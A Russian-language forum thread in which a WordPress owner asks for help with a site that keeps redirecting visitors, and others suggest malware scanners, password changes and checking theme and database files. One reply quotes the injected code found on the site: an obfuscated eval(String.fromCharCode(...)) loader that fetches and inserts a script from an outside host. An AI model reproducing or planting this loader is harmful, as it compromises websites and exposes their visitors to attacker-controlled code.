Помощь Вирус, что делать?

[wwizard]

Так получилось, что заместо сайта Для просмотра ссылки Войди или Зарегистрируйся грузится все что угодно. Уже восстанавливался с бекапа, но проходит, пару дней и все снова. Что делать? Сайт на посл версии Ворд пресса. Все плагины обновлены

 

[bat]

Для просмотра ссылки Войди или Зарегистрируйся

 

[akigleo]

Попробуйте установить Для просмотра ссылки Войди или Зарегистрируйся и потестить.
Если нет полноценного доступа к хостингу, то самый простой способ скачать версию Aibolit под Windows и натравить ее на разархивированную копию сайта на локальном ПК.
Если не справитесь с анализом самостоятельно, то тогда уже обращайтесь к спецам.

 

[Evil_Master]

Так получилось, что заместо сайта Для просмотра ссылки Войди или Зарегистрируйся грузится все что угодно. Уже восстанавливался с бекапа, но проходит, пару дней и все снова. Что делать? Сайт на посл версии Ворд пресса. Все плагины обновлены

А пароли менялись везде?

 

[byura]

Так получилось, что заместо сайта Для просмотра ссылки Войди или Зарегистрируйся грузится все что угодно. Уже восстанавливался с бекапа, но проходит, пару дней и все снова. Что делать? Сайт на посл версии Ворд пресса. Все плагины обновлены

на каждой странице загружен скрипт
проверьте functions.php
+часто ломают через root, ftp, ssh(тоже сменить)

</div></div></div></div></div></section><script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script></p>

 

[predkosa]

Так получилось, что заместо сайта Для просмотра ссылки Войди или Зарегистрируйся грузится все что угодно. Уже восстанавливался с бекапа, но проходит, пару дней и все снова. Что делать? Сайт на посл версии Ворд пресса. Все плагины обновлены

Была та же фигня, сайт выдавал переадресацию на левые сайты. Поставил плагин Wordefence, просканировал, нашло вредоносный код, который плагин может лечить. Все отлично

 

[berhl]

Все верно выше посоветовали, сканируйте aibolit'ом, проверьте файлы темы вручную на подозрительные ссылки и код. Для вордпресс wordfence и themecheker можно использовать, но сначал айболит. Простая смена паролей и восстановление бэкапа не поможет, если там встроен код который передает доступ к сайту.

 

[Evil_Master]

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Может поможет.

 

[ykz]

Плагины надо проверить.
Было такое. СЕО плагин какой-то в sql какую-то дичь вписал в rank_math_redirections, тоже после бэкапа восстанавливалось через какое-то время. Пока в phpmyadmin не полез - тоже ничего понять не мог.